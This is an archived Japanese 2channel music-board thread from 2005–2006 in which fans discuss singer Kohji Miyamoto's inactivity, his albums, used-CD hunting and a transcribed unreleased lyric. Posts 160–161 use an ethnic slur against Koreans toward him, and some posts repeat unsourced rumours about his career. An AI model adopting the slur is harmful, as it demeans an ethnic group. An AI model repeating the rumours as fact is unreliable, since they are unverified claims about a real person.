5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【タイトで】宮本浩次【キュートな】

1 :NO MUSIC NO NAME:2005/07/31(日) 01:23:42 ID:PZaSMpqo
ヒロジじゃなくってコウジの方です

公式サイト
http://www.miyamotokohji.com/
インターネットラジオMUMIX
http://www.mumix.net/radio/index.html

2 :NO MUSIC NO NAME:2005/07/31(日) 10:08:32 ID:e5ThoMhW




                  おなら


3 :NO MUSIC NO NAME:2005/07/31(日) 11:11:42 ID:mvCfSTcu
こうちゃん いま何やってるのかな…
ライブやってんの?

4 :NO MUSIC NO NAME:2005/07/31(日) 22:16:27 ID:pf9XmdKY
消息不明

5 :NOMUSICNONAME:2005/08/01(月) 00:13:30 ID:1vpZZXRr
林田健二やスガシカオみたいにSMAPに曲提供すればいいのにな


6 :NOMUSICNONAME:2005/08/02(火) 03:15:36 ID:RForchYg
伝説のミュージシャン板の方がイイなこのスレは

7 :NO MUSIC NO NAME:2005/08/02(火) 03:49:01 ID:1W8Jypct
宮本氏は岡村チャンと繋がりあるの?
タイトでキュート〜を聞いた時、岡村の匂いを感じた!

8 :NO MUSIC NO NAME:2005/08/02(火) 04:53:23 ID:eyN5lPh8
岡村チャンっぽい

9 :NO MUSIC NO NAME:2005/08/02(火) 10:20:54 ID:ZLhqoX0o
えれふぁんとかしましじゃないのね。うん。きゅーとじゃないもんな。

10 :NOMUSICNONAME:2005/08/03(水) 22:40:19 ID:T8q8028k
>>9
エレカシの方がデビュー早いよな?
なのに向こうはヒロジってちょっと変わった名前

>>7-8
たしか子供の頃から歌謡曲が好きだったらしいから
洋楽テイストじゃない耳に馴染む曲が多いんだよ

11 :NO MUSIC NO NAME:2005/08/05(金) 19:56:51 ID:8PtwkQml
変わった名前で悪かったな >>10
本名なんだよお〜\(`Д´)/

12 :NO MUSIC NO NAME:2005/08/06(土) 05:18:58 ID:5ssWk2Kh
保守

13 :NO MUSIC NO NAME:2005/08/08(月) 05:43:34 ID:Ybmg3CDg
 

14 :NOMUSICNONAME:2005/08/12(金) 19:15:29 ID:9ApsqPzY
活動してないんだろ?

15 :NO MUSIC NO NAME:2005/08/12(金) 19:46:37 ID:ygxnGfQF
>>14
そなの?


16 :NO MUSIC NO NAME:2005/08/13(土) 01:06:55 ID:Iz8rkqWr
98年のミートザワールドビートのビデオを発掘!
またライブ見たいなぁ


17 :NO MUSIC NO NAME:2005/08/16(火) 02:47:02 ID:1dDTdffL
こうちゃんライヴやってー
声聴きたいよ

18 :NO MUSIC NO NAME:2005/08/18(木) 00:23:08 ID:fEzwn5CE
ほしゅ

19 :NO MUSIC NO NAME:2005/08/20(土) 00:31:57 ID:NeBBNEEA
あげる。

20 :NO MUSIC NO NAME:2005/08/20(土) 02:34:42 ID:onH4qCmd
このスレの住人は3人くらいか

21 :NO MUSIC NO NAME:2005/08/20(土) 15:16:51 ID:YDI1BZpe
公式のメルマガ登録してる?
情報届く?

22 :NO MUSIC NO NAME:2005/08/20(土) 22:44:31 ID:sM3yEO+d
もう半年経つけど、
登録確認のメール以降
全く何も届かないよね。


23 :NO MUSIC NO NAME:2005/08/26(金) 13:06:12 ID:PsHM9PXI
CD出して〜。

24 :NO MUSIC NO NAME:2005/08/26(金) 19:39:32 ID:JAXJvW4Z
ライブやってくれ〜

25 :NO MUSIC NO NAME:2005/08/27(土) 01:04:58 ID:yYviCOVM
ライブやってー
こーうちゃーん

26 :NO MUSIC NO NAME:2005/08/29(月) 19:45:51 ID:99a31SOv
te

27 :NO MUSIC NO NAME:2005/08/31(水) 01:25:48 ID:WkvbrXxo
なぜ公式にBBSがなくなったんだろうか…

28 :NO MUSIC NO NAME:2005/08/31(水) 10:10:10 ID:sFOdTXtF
管理する人もいないのかな。ページもあのまま止まってるし。

29 :NO MUSIC NO NAME:2005/09/04(日) 21:06:40 ID:YmTXQTGN
りあるろっくすに問い合わせた人いる?

30 :NO MUSIC NO NAME:2005/09/05(月) 16:41:09 ID:1G+3xrpM
昔、ユースケサンタマリアとテレビに出てたな。

31 :NO MUSIC NO NAME:2005/09/06(火) 03:26:27 ID:ICAqWLp2
活動してる?

32 :NO MUSIC NO NAME:2005/09/08(木) 20:04:38 ID:rmEtPtCh
前に立ってたスレで、レコード会社との契約が切れてそれっきりみたいなことが書いてあった気がする
そういやライブ盤もインディー扱いだしね…次のアルバムはいつ出るのやら

33 :NO MUSIC NO NAME:2005/09/08(木) 22:33:12 ID:FL6uKvKa
契約切れた後もライブはやってたのに、
公式HPがリニューアルしてから音沙汰なしだね。


34 :NO MUSIC NO NAME:2005/09/09(金) 12:34:37 ID:E9TfYGTj
活動資金も尽き果てたのでしょう。
後はこのままFade Out...

35 :NO MUSIC NO NAME:2005/09/09(金) 21:21:04 ID:JMIpoUny
    〃〃∩  _, ,_
     ⊂⌒( `Д´) < ヤダヤダ!CD出してくれなきゃヤダヤダ!!
       `ヽ_つ ⊂ノ   
              ジタバタ

      _, ,_
     (`Д´ ∩ < もっともっと歌ってくれなきゃヤダヤダ!
     ⊂   (    
       ヽ∩ つ  ジタバタ
         〃〃

       ∩
     ⊂⌒(  _, ,_) < FadeOutなんて悲しすぎる・・・
       `ヽ_つ ⊂ノ      ヒックヒック

36 :NO MUSIC NO NAME:2005/09/09(金) 23:53:36 ID:dTGI2iWt
ライブ行きたい

37 :NO MUSIC NO NAME:2005/09/10(土) 02:17:37 ID:7JKh092L
とりあえず生存表明とかしてくんないかな…

38 :NO MUSIC NO NAME:2005/09/13(火) 21:47:49 ID:wGnhHD4h
ベランダでハーブもいいけど、
そろそろライブ見たいな。

39 :NO MUSIC NO NAME:2005/09/15(木) 23:43:08 ID:W/RD31OB
保守あげ。
九月の雨が染みる季節ですね…

40 :NO MUSIC NO NAME:2005/09/16(金) 00:11:55 ID:ZNIpDOVm
何してるんだろーね。興味あるわー

41 :NO MUSIC NO NAME:2005/09/18(日) 22:46:54 ID:eHcsPo0U
(Take my)Blue Trainいい曲すぎ
新作はまだ待っててもいいのかな…

42 :NO MUSIC NO NAME:2005/09/21(水) 11:03:01 ID:xXlyVM86
誰かりんごの音源うpして〜

43 :NO MUSIC NO NAME:2005/09/23(金) 22:33:31 ID:G7OzQR+R
本当になにやってるんだろう?
生活は???

44 :NO MUSIC NO NAME:2005/09/26(月) 21:04:04 ID:8wPMPy7H
赤いリンゴを

45 :NO MUSIC NO NAME:2005/09/27(火) 22:42:02 ID:BM/N8D9k
唇よせて〜

46 :NO MUSIC NO NAME:2005/09/27(火) 22:43:34 ID:DVFIuZlt
雨に打たれた赤い屋根がもうなんてきれいなのでしょう

47 :NO MUSIC NO NAME:2005/10/01(土) 02:01:50 ID:DpuojN4x
もう何でもいいから会いたい。声だけでも聞かせて。

もっと商売上手だったら…

48 :NO MUSIC NO NAME:2005/10/01(土) 13:25:19 ID:ltHAvy4i
この人はえれファンとカシマシの人なのですか?

49 :NO MUSIC NO NAME:2005/10/01(土) 14:59:28 ID:oYkwWWN6
>>48
1嫁

50 :NO MUSIC NO NAME:2005/10/08(土) 02:16:58 ID:js0ETOhT
Amazonでだいぶ前に投稿したHarunokiokuレビューが、いつの間にか掲載されていた…
http://www.amazon.co.jp/exec/obidos/ASIN/B0002O4A50/qid%3D1128705380/249-2447021-6294724
またライブやってよう…

51 :NO MUSIC NO NAME:2005/10/12(水) 00:38:32 ID:8GZP+zP6
あげ

52 :NO MUSIC NO NAME:2005/10/13(木) 20:39:37 ID:CKr99eBP
こうちゃん 元気かなー…。

53 :NO MUSIC NO NAME:2005/10/15(土) 02:29:25 ID:D9ONFYie
ほしゅ

54 :NO MUSIC NO NAME:2005/10/15(土) 03:18:37 ID:CJiw8swA
昨日ふと聞きたくなり奇麗になりたいを回していた
スレ偶然にもハケーンして嬉しい

55 :NO MUSIC NO NAME:2005/10/16(日) 14:49:57 ID:1BkiH1yg
mixi内にコミュニティ発見したけど特に語る内容無いんだよなぁ・・・

56 :NO MUSIC NO NAME:2005/10/18(火) 20:08:07 ID:iSOyGtAU
宮本浩次に今ちょっと興味もってます。

曲はまったく聴いたことないのですが、シンガーソングライター好きなので…。

邦楽だと斉藤和義や山崎まさよし、スガシカオなんかが大好きなんですけど、同じ感覚で聴けますか?…なんか変な言い方だな。
↑に挙げたアーティストが好きで宮本浩次も好き!って方いますかね?


57 :NO MUSIC NO NAME:2005/10/18(火) 20:28:39 ID:ujaNZdKP
ノシ
>>56が挙げたアーティスト、全員好きだw

百聞は一聴にしかず。
↓でライブ音源聴けるから、一度聴いてみて。
ttp://www.mumix.net/radio/index.html

58 :56:2005/10/18(火) 21:26:06 ID:qC2nEY/Z
>>57
ご丁寧にリンクまでTHXです!
けどなにぶんネット環境が悪いものでバッファ中ばっかりで…orz

でも雰囲気はなんとなくつかめました。ちょっと佐野元春っぽいにおいがしないでもないような…。

とにかく好きになれそうな感じなのでアルバム買ってみます♪
初心者にお薦めの作品ってありますか?

59 :57:2005/10/19(水) 20:28:10 ID:FvKCyK9Z
>>58
んー…私はどのアルバムにも「これは聴いて欲しい!」って思う曲があるから
どれから聴いてとは言えないな。
ジャケ写が好きとか、曲名が気になるとか、そんな感じで選んでみたらいいかも。

60 :NO MUSIC NO NAME:2005/10/20(木) 18:32:29 ID:oDgA/prP
>>58
以前、ネットラジオで元春の割とマイナーな曲を歌っていましたし、
影響は受けていると思います。
自分のオススメは1stの「奇麗になりたい」です。

61 :NO MUSIC NO NAME:2005/10/20(木) 18:37:00 ID:oDgA/prP
>>56
何も活動していない今、何をキッカケに興味を持ったのか気になる…w

62 :NO MUSIC NO NAME:2005/10/22(土) 08:22:18 ID:A1bveKDB
ほしゅ

63 :NO MUSIC NO NAME:2005/10/25(火) 20:42:18 ID:cNrWA/Jw
エレファントカシマシいいよね〜(・∀・)ニヤニヤ

64 :NO MUSIC NO NAME:2005/10/26(水) 00:03:57 ID:MSECLN3H
歌一個もしらない

65 :NO MUSIC NO NAME:2005/10/26(水) 00:35:37 ID:VE8/TSzg
デビューシングル、1stアルバムをリアルタイムで買った俺が来ましたよ
こんなスレあったのかよwwwww

シングルはなくなっちゃったけどアルバムは時々聞く
ファースト好きなら二枚目、三枚目も買いですかね?



66 :NO MUSIC NO NAME:2005/10/26(水) 00:58:05 ID:VE8/TSzg
1stちゃんと帯まで残ってた
1枚目しか持ってないけど、これ名盤だから興味持った人いたら聴いて欲しい

67 :NO MUSIC NO NAME:2005/10/26(水) 09:18:17 ID:1pGcOTcI
1st〜3rdあたりまではBOOK OFF行けば100円で買えるからね。
それ以降になると流通枚数自体少なくて(ry

68 :NO MUSIC NO NAME:2005/10/26(水) 09:23:59 ID:2volCvB5
>>65
3rdは珠玉の名盤、というか折れ的人生のトップ3に入るぐらいの傑作

69 :NO MUSIC NO NAME:2005/10/26(水) 21:07:47 ID:VE8/TSzg
ブックオフで発見ししだい保護いたします。
レスサンキュー。

70 :NO MUSIC NO NAME:2005/10/28(金) 00:01:58 ID:i+4ky3M7
2nd発売当初、タワレコでサンプルCD(8cm)も購入ついでに貰ったよ
音がぎっしりだったり、テンポ速い曲に聴き疲れると聴きたくなる
最近は「午後のパレード」「冷たいアイスティー」で癒される

71 :NO MUSIC NO NAME:2005/11/02(水) 21:37:05 ID:8D9xlk9V
2ndでハマった俺が来ましたよ。1stはブクオフの250円。
3rd、4thも「エレカシ」のコーナーに並べられていたのを保護しました。

72 :NO MUSIC NO NAME:2005/11/04(金) 13:35:58 ID:JyAU0o/u
近所のブクオフ売ってないorz

73 :NO MUSIC NO NAME:2005/11/04(金) 21:19:14 ID:+/q41crk
98年のミートザワールドビートはメンバーも最高やった!
見に行けてほんまに良かった。
MUSIC GANBOも毎週聞いてたよ。KANとの相性がいい!

74 :NO MUSIC NO NAME:2005/11/04(金) 21:39:55 ID:S86zJay+
>>72
ハードオフのジャンクコーナーにあったりする。

75 :NO MUSIC NO NAME:2005/11/06(日) 19:17:46 ID:VraxuBHS
age

76 :NO MUSIC NO NAME:2005/11/10(木) 04:04:34 ID:Nef4XqFg
ヒロジのファンとしては、紛らわしいので改名して欲しい


77 :NO MUSIC NO NAME:2005/11/10(木) 05:52:18 ID:5kKIJZhE
エレカシでええやん。

78 :NO MUSIC NO NAME:2005/11/10(木) 20:56:54 ID:prPql7Tg
>76
は?

79 :NO MUSIC NO NAME:2005/11/12(土) 01:41:01 ID:hKeUbyZq
ポップ

80 :NO MUSIC NO NAME:2005/11/17(木) 16:28:53 ID:mM7r7CiR
ステップ

81 :69:2005/11/17(木) 19:03:54 ID:M0k7PM6r
ずーっと探してるのですが見つからん!
あっても綺麗になりたいだけ!それは持ってますって!
休日を一日つぶしてブックオフ行脚に出かけるか・・・・

とも思ったがここは一つ新品で買ってみましょうか。

82 :NO MUSIC NO NAME:2005/11/17(木) 19:41:05 ID:impxUumV
新品すら救出困難な可能性もあるのだが

83 :NO MUSIC NO NAME:2005/11/22(火) 15:00:04 ID:2vDgpYPI
もう辞めちゃったの?


84 :NO MUSIC NO NAME:2005/11/25(金) 19:48:22 ID:uoWsRdlz
本気でいまどこにいるのか知りたい。

85 :NO MUSIC NO NAME:2005/11/26(土) 00:24:13 ID:3wPYnUBo
未発表曲?「林檎」の歌詞わかる人いますか?

86 :NO MUSIC NO NAME:2005/11/30(水) 00:03:58 ID:MhfuKNEx
ひさびさにパーソナルノーツ聞いたage

87 :NO MUSIC NO NAME:2005/12/03(土) 18:23:45 ID:k4MwPTRs
>>86上がってないよage

88 :NO MUSIC NO NAME:2005/12/04(日) 14:05:45 ID:Awp2w29d
うろ覚えの、歌詞。
赤い林檎をかじった両手はつ〜いにとんで
眠たげな〜(忘れた)・・
だって 互いの指がかさなりあうときでも〜・・・

89 :NO MUSIC NO NAME:2005/12/04(日) 23:58:40 ID:cDovizwB
うろ覚えの、歌詞。
赤い林檎をかじった両手はつ〜いにとんで
眠たげな空の向こうへ行けば晴れてた
雲が流れる度に君はやって来てもう眠れない
そのまつげ〜? 〜ようなボクだから負けそうさ
だって 互いの指がかさなりあ〜うときでも〜・・・
震え、震えてる 気が付けば
君はボクをも〜いで 密かに齧りながらキ〜ス





90 :NO MUSIC NO NAME:2005/12/06(火) 10:09:56 ID:zb6RtT0C
ラジオで耳コピしてきた〜


赤い林檎をかじった両手はついに飛んで
眠たげな空の向こうに行けば晴れてた
雲が流れるたびに君はやってきて僕をもいだ
抱きしめてもくれずにもたれたり巻き付いたり

とても小さなガラスのかけらを放る(ボール?)見たいに
君の言葉はいつでも胸を打ち抜きそうで
いたずらのその指に遊ばれてもう眠れない
その巻き毛にしがみつくような僕だから負けそうさ

だって互いの指が重なり合うときでも
ふるえふるえてる気が付けば君は僕をもいで
密かにかじりながら消えそう

※Repeat

ダララララッタラ〜 ×4

91 :NO MUSIC NO NAME:2005/12/06(火) 10:12:51 ID:zb6RtT0C
久々に聞いたけどやっぱいい曲だ…

92 :NO MUSIC NO NAME:2005/12/06(火) 18:47:59 ID:fzxAhCGa
聴いた事無いし。

93 :NO MUSIC NO NAME:2005/12/07(水) 01:55:06 ID:mB7ArVQd
>>90過去の録音?

94 :NO MUSIC NO NAME:2005/12/07(水) 02:57:46 ID:Kn+YBsmR
わ!まさかスレがあるとは!
嬉し〜な〜 リア厨時代雑誌切り抜いたりしてたよ

95 :NO MUSIC NO NAME:2005/12/07(水) 22:11:38 ID:TmDUdVta
>抱きしめてもくれずにもたれたり巻き付いては

でしたスマソ

>93
そうです。2、3年前の音源です



96 :NO MUSIC NO NAME:2005/12/08(木) 00:01:53 ID:nrcu3l5T
何度もスミマセン。

>眠たげな空の向こうへ行けば晴れてた
です。

あとやっぱりここは
>とても小さなガラスのかけらを放るみたいに
であってると思います。

97 :NO MUSIC NO NAME:2005/12/09(金) 23:59:00 ID:STHAdBWP
すごい!ありがとうございます!


98 :NO MUSIC NO NAME:2005/12/17(土) 23:50:31 ID:ZnX3TFrl
まじで辞めちゃったの?・・・

99 :NO MUSIC NO NAME:2005/12/18(日) 08:24:58 ID:F9jw/kPi
>98
辞めたの??
冬眠中とかじゃなくて?

100 :NO MUSIC NO NAME:2005/12/21(水) 11:17:25 ID:Zbt+hYOR
とりあえず100get

101 :NO MUSIC NO NAME:2005/12/24(土) 16:17:02 ID:UIK1GmOY
保守・・・

102 :NO MUSIC NO NAME:2005/12/24(土) 19:08:03 ID:Z11m/akF
保守になってないよage

103 :NO MUSIC NO NAME:2005/12/24(土) 20:56:31 ID:SqD+dgLy
>>99
冬眠のつもりが凍死…

104 :NO MUSIC NO NAME:2005/12/24(土) 23:47:08 ID:W+gojA1y
正解かもね

105 :NO MUSIC NO NAME:2005/12/25(日) 21:15:35 ID:84wFBjH3
事務所から「仕事しろ」って言われても「ヤダー」って駄々こねてたら、
結局愛想尽かされて捨てられた、って話を聞いたことがあるんだけど……。
んー、どこで知ったんだか思い出せない。

106 :NO MUSIC NO NAME:2005/12/26(月) 22:40:58 ID:PoisOTOW
ttp://www.mumix.net/store/top.html
こんな状況でも、なお看板の一人として扱われてはいるけどね…
心くすぐる言葉遊びがまた聴きたい。

107 :NO MUSIC NO NAME:2005/12/26(月) 23:06:14 ID:NL7gJgN/
>>105
別のところかもしれないけれど、ここにも書かれているね。
ttp://www.osk.3web.ne.jp/~elephant/tuiseki/b/m23.html

108 :NO MUSIC NO NAME:2005/12/30(金) 00:46:37 ID:upL5DETH
冬眠?
理由は?

109 :NO MUSIC NO NAME:2005/12/30(金) 04:07:40 ID:aXiaXLw5
辞めた?
理由は?

110 :NO MUSIC NO NAME:2006/01/02(月) 08:23:32 ID:RWoIqp+M
りあるろっくすに問い合わせた人いないのかい?


111 :NO MUSIC NO NAME:2006/01/08(日) 19:26:43 ID:UudvxXoW
おちそう・・・

112 :NO MUSIC NO NAME:2006/01/09(月) 18:36:45 ID:KMCUn2kM
逢いたいよ〜〜


113 :NO MUSIC NO NAME:2006/01/09(月) 22:50:58 ID:ytp3W4Nh
東貴博のラジベガスの「もったいない」のコーナーで
「もったいないぜ」がかかったよ!

びっくりした!

114 :NO MUSIC NO NAME:2006/01/11(水) 16:14:08 ID:D7gfPTbB
今日やっとサード見つけたので即買いました

115 :NO MUSIC NO NAME:2006/01/11(水) 16:18:21 ID:D7gfPTbB
>>71
そうかエレカシコーナーもチェックすべきだった


116 :NO MUSIC NO NAME:2006/01/14(土) 00:52:23 ID:64yIe/Dp
そうなのか、彼はお仕事嫌いなのか。。。
そんだったらライブやってるうちに行くべきだったな
登録したメルマガは意味ナシか・・・_| ̄|○

117 :NO MUSIC NO NAME:2006/01/14(土) 03:03:33 ID:bbrO0t1E
仕事っていうか、露出が嫌いなのでは…。
三都物語のときは一生音楽やっていきたいって言ってたけど、歌えたら素人でも構わないのかしら…。

ちなみに昔リアルロックスにメール送ったことありますが返事なしでした。

118 :NO MUSIC NO NAME:2006/01/19(木) 02:45:10 ID:6oFKchIu
派手じゃなくていいから続けてほしい。

119 :116:2006/01/19(木) 15:27:36 ID:OVojixlp
117さんありがとう。すこし希望がもてました。気長に待ってみようとおもいましす。

120 :NO MUSIC NO NAME:2006/01/22(日) 06:03:58 ID:ntwEBhH4
午後のパレードは名曲

121 :NO MUSIC NO NAME:2006/01/22(日) 13:57:20 ID:8dXAJZXP
いつも二人では名曲

122 :NO MUSIC NO NAME:2006/01/22(日) 22:27:04 ID:hbJkiFAj
クールなふりした仕事は無理

123 :NO MUSIC NO NAME:2006/01/23(月) 14:46:22 ID:yLvnRoc4
名古屋のライブはいつも名演 

124 :NO MUSIC NO NAME:2006/01/23(月) 21:36:06 ID:tEP/iTxA
ミュージックスクエアキタ━(゚∀゚)━
タイトル間違えたけど。

125 :NO MUSIC NO NAME:2006/01/23(月) 22:39:06 ID:koguzrPS
何があったんすか?
曲ながれたのかい

126 :NO MUSIC NO NAME:2006/01/25(水) 18:02:51 ID:9/6D06Ym
川本真琴も廃業らしいな

127 :NO MUSIC NO NAME:2006/01/26(木) 22:45:42 ID:gJ3Jbm60
>>125
NHK-FMの「MUSIC SQUEA」でDJ間宮優希のお薦めの曲として「タイトでキュートなヒップがシュールなジョークとムードでテレフォンナンバー」(←合ってるかな…)がかかった。CDは何年も出してないけど、曲作りはしてるみたいな紹介とともに。
昔、彼女が宮本浩次と仕事をしてて、改めてデビュー曲を聞いてみましょうって事だった。

128 :NO MUSIC NO NAME:2006/01/28(土) 20:10:25 ID:jgdsrefK
誰か〜、リアルロックスに問い合わせてみて〜。
て、私聞いてみようかな。

129 :NO MUSIC NO NAME:2006/02/04(土) 22:20:49 ID:4bkXJTD/
経営苦しいとは聞いてたけど、本当にバナナホールなくなるんだろうか…
もう浩ちゃんがあそこでバナナホールの唄歌うのを待ってるのに!

130 :NO MUSIC NO NAME:2006/02/08(水) 03:22:21 ID:6SmIisGq
hosu

131 :NO MUSIC NO NAME:2006/02/09(木) 04:16:57 ID:fQ66y6qG
冗談で検索してみたらスレがあったので吃驚感動。
リア厨のときから好きだけど、今もファンクラブとか存続してるのかな?

以前ライブでギターの弦を引き当てたのが唯一の思い出(つД`)
ネットラジオでも良いから今のこうちゃんの声が聴きたいよー。

132 :NO MUSIC NO NAME:2006/02/09(木) 18:12:46 ID:24D8zAnD
CUTEは解散しました…
代わりになる何かをファンの為に考えると言ってそのままナシノツブテ
突然変わったHPは充実感ゼロ

133 :NO MUSIC NO NAME:2006/02/09(木) 20:25:29 ID:51WAYEOh
活動してないのに充実するワケなかろーに

134 :NO MUSIC NO NAME:2006/02/10(金) 00:59:28 ID:fSOMweDg
そうだったのですか・・・・・・
今のサイト、何だか遺跡みたいで切ないです(´;ω;`)

某三枝師匠の番組で「ポルサリーノ」を聴いてた頃が懐かしい。。

135 :NO MUSIC NO NAME:2006/02/10(金) 01:29:46 ID:npI1fglH
遺跡w
もう歌わないのかな
聴きたいな

136 :NO MUSIC NO NAME:2006/02/11(土) 20:01:13 ID:bF4ungSP
HP前の残してた方が良かった
Sunny daysのPV見れなくなったのが一番悲しい

137 :NO MUSIC NO NAME:2006/02/22(水) 06:14:15 ID:PGdE6E5U
保守

138 :NO MUSIC NO NAME:2006/03/01(水) 18:54:22 ID:bUxOyzTY
一応保守

139 :NO MUSIC NO NAME:2006/03/02(木) 19:29:57 ID:SZQyWOqE
お〜い

140 :NO MUSIC NO NAME:2006/03/04(土) 17:18:04 ID:pBYJAK+P
そろそろ動き出してほしいなぁ…。

141 :NO MUSIC NO NAME:2006/03/04(土) 18:36:03 ID:Vbun8GGT



142 :NO MUSIC NO NAME:2006/03/05(日) 19:46:11 ID:QrpppANY
何か情報ないのかな・・・

143 :NO MUSIC NO NAME:2006/03/10(金) 09:08:19 ID:e+Zxp+9j
アンブレラのツアー2回見たな…懐かしい。その前のツアーは山口公演をFMでライブ音源流してたような。あれ?それは山崎まさよしだけかな?

144 :NO MUSIC NO NAME:2006/03/18(土) 18:13:05 ID:5n/IxmH3
hosyu

145 :NO MUSIC NO NAME:2006/03/31(金) 11:19:27 ID:X1KuXmWl
去年3月に携帯サイトリニューアルしてからまったく更新されてないのは気のせいでしょうか?

146 :NO MUSIC NO NAME:2006/04/06(木) 10:57:03 ID:kS5G+065
気のせいではありません

147 :NO MUSIC NO NAME:2006/04/07(金) 21:45:04 ID:GrxDs9iU
久々にファーストを聞いたけど、いいねぇ。
九月の雨とか、冷たい会話に冷たいミルクティ。

148 :NO MUSIC NO NAME:2006/04/07(金) 21:56:48 ID:i9R4AtNm
いや、冷たいアイスティーですよw

149 :NO MUSIC NO NAME:2006/04/07(金) 22:45:36 ID:GrxDs9iU
アウチッ!
トーストだからミルクかなー、と脳内変換が。

150 :NO MUSIC NO NAME:2006/04/10(月) 19:51:33 ID:xqCcqSDG
バナナホール閉店・・・

151 :NO MUSIC NO NAME:2006/04/14(金) 02:15:53 ID:aVgAuSfE
2年前のワンマン、東京の回に行けなくてバナナホールまで遠征したなぁ。
彼は今どうやって生計を立ててるんだろう?

152 :NO MUSIC NO NAME:2006/04/18(火) 01:42:07 ID:kblvOrMm
博多大吉さんがブログに書いてたのですが
ネットで検索すると無料で聴けるライブが見付かるらしいのですが
どこですか?

153 :NO MUSIC NO NAME:2006/04/18(火) 04:09:49 ID:aqy2Fy3B
釣りかと思ったら、ほんとに書いてたね。
書きこむ前に検索したかい?
とりあえず釣られてみるよ、これかな?

つttp://www.sonymusic.co.jp/Music/PickUp/9808/KohjiMiyamoto/top.html

154 :NO MUSIC NO NAME:2006/04/18(火) 10:35:55 ID:1Njc1ieC
>ぶっちゃけて言うと、僕が最近の音楽に疎いのは
>宮本浩次さんを聴き続けているからで、
>なぜならば、それ以上の名曲がヒットしていないからです。

今日から博多大吉のファンになりますw
アタックチャンスじゃない方の人だよね?

155 :NO MUSIC NO NAME:2006/04/18(火) 18:26:16 ID:WMOVcl4/
>無料で聴けるライブ
普通にMUMIX Radioなのでは・・
http://www.mumix.net/index.html

156 :153:2006/04/18(火) 21:42:57 ID:2YvSt5X1
>155
ああ、そうか!これまた失敬。
考えすぎたな…。

157 :NO MUSIC NO NAME:2006/04/20(木) 01:40:27 ID:KzNgZCbq
気になったからググったら…博多大吉、いいヤツだな。
そうだよ、宮本浩次のない人生なんて…。

158 :NO MUSIC NO NAME:2006/04/20(木) 13:04:58 ID:XGQAvoJI
博多大吉、この人絶対いい人だよ。今までアタックチャンスの人しか見てなかったけど、改めます。これがきっかけで何か起こらないかな…。

159 :NO MUSIC NO NAME:2006/04/22(土) 03:08:14 ID:sYPR/bZL
もう日本にはいない

160 :NO MUSIC NO NAME:2006/04/29(土) 20:24:03 ID:PWnAygCg
チョンだからな

161 :宮本 ◆.J7PuTP9Aw :2006/05/03(水) 04:59:39 ID:jXOyjiiv
パチンコでもして宮本チョンに送金しよっかな。

162 :NO MUSIC NO NAME:2006/05/14(日) 23:09:21 ID:KFBRK7ve
浩ちゃん元気かなー

163 :NO MUSIC NO NAME:2006/05/16(火) 01:01:36 ID:rbiY0CQt
何してるのかな?
ほんとうた上手だなー


164 :NO MUSIC NO NAME:2006/05/16(火) 02:10:45 ID:QmnJ/O6F
俺は最期の最期まで雲のジュウザ!!!
http://ex11.2ch.net/test/read.cgi/morningcoffee/1147707094/l50

165 :NO MUSIC NO NAME:2006/05/22(月) 11:20:57 ID:DoVeXPE3
どうやら事務所の契約も切れたみたいですね

166 :NO MUSIC NO NAME:2006/05/23(火) 16:37:58 ID:Q/pdfq0T
そしてGood bye...

167 :NO MUSIC NO NAME:2006/05/24(水) 01:36:45 ID:vVjhpFxT
どうでもいいガセだらけ・・・・・・

168 :NO MUSIC NO NAME:2006/05/24(水) 09:22:46 ID:AOKiMGWY
声が聞きたい。フォークシンガーが収録されたアルバムはどうなったんだろう。

169 :NO MUSIC NO NAME:2006/05/26(金) 13:22:18 ID:8AV56D6U
皆さんメールきました?しばらく待つしかないようですね・・

170 :NO MUSIC NO NAME:2006/05/26(金) 13:39:37 ID:ibIbOn+2
メールキタ━━━( ´∀`)・ω・) ゜Д゜)゜∀゜)・∀・) ̄ー ̄)´_ゝ`)−_)゜∋゜)´Д`)゜ー゜)━━━!!!! 

171 :NO MUSIC NO NAME:2006/05/26(金) 13:41:26 ID:ibIbOn+2
>169
関係者?w
読んだ後、メールチェックしたら着てたからビビりました。
とりあえず、ひと安心。

172 :NO MUSIC NO NAME:2006/05/26(金) 13:42:44 ID:GwseYTE1
ちょwwwww初メルがこれかwwww

リアルロクースは最低な事務所だたからこれでいいんジャマイカ?

173 :NO MUSIC NO NAME:2006/05/26(金) 15:19:37 ID:8lY7lP3p
メールキタ―――(゚∀゚)―――!!
続報を待つのみ…か。

174 :NO MUSIC NO NAME:2006/05/26(金) 18:24:41 ID:LZAHY3Z8
どんな内容のメール?
メルアド変更した後、登録し忘れてた…。
教えてちゃんでスマソ。

175 :NO MUSIC NO NAME:2006/05/26(金) 18:33:55 ID:mLXIhgIq
>174
オフィのインフォに追加されているのと同じ内容でした。

176 :NO MUSIC NO NAME:2006/05/26(金) 19:50:05 ID:kDyTfIiK
メールキタ━━━━━━(゚∀゚)━━━━━━ !!!!!

177 :NO MUSIC NO NAME:2006/05/27(土) 00:05:56 ID:FcTl+lRI
こんなスレあったんだ。
『綺麗になりたい』リアルタイム買ったよ。
「タイトでキュートなヒップがシュールなジョークとムードでテレフォンナンバー」がFM大阪でガンガン
流れてたよね。
捨て曲なしで完成度の高いアルバムだった。

でも『umbrella』が好みじゃなくてそれ以降聴かないままだったな、名前自体段々と聴かなくなっていったし。
ここで知ってネットラジオでライブ聴いたけど良いねぇ〜勿体無い事したかな(´・ω・`)
あ、今「キレイになりたい」が流れてきた♪

久しぶりにPV観てから寝よう。
楽曲も良いけどPVも面白いよね。

178 :NO MUSIC NO NAME:2006/05/27(土) 08:09:21 ID:mrPJyU8A
これでバニラクレープやだいたい…のPVもお蔵入りか…いつかを夢見てたんだが

179 :NO MUSIC NO NAME:2006/05/28(日) 10:01:26 ID:zn7D1nXf
工エェ(´д`)ェエ工
PVお蔵入り確定?
リアルロックスが封印してしまうんでしょうか?
そんな馬鹿な。

180 :NO MUSIC NO NAME:2006/05/28(日) 11:28:16 ID:lpd+Jw40
たぶん権利はEPICにある。新しく事務所に入ってまたエピと契約すれば可能性はあるかも??
でも当分メジャーで活動しなさそうだよね

181 :NO MUSIC NO NAME:2006/05/28(日) 23:38:14 ID:Z2oikz6J
エピはない。
エーベックソ。

182 :NO MUSIC NO NAME:2006/05/29(月) 01:36:08 ID:IrYJABNx
それほんと!?
そうだとしたら、期待もてるかも。

183 :NO MUSIC NO NAME:2006/05/29(月) 08:36:51 ID:q74imTvh
エイベと契約じゃPV出ない

184 :NO MUSIC NO NAME:2006/05/29(月) 10:33:09 ID:Iml/Ar3N
そもそも本人に制作意欲があるかどーかも…

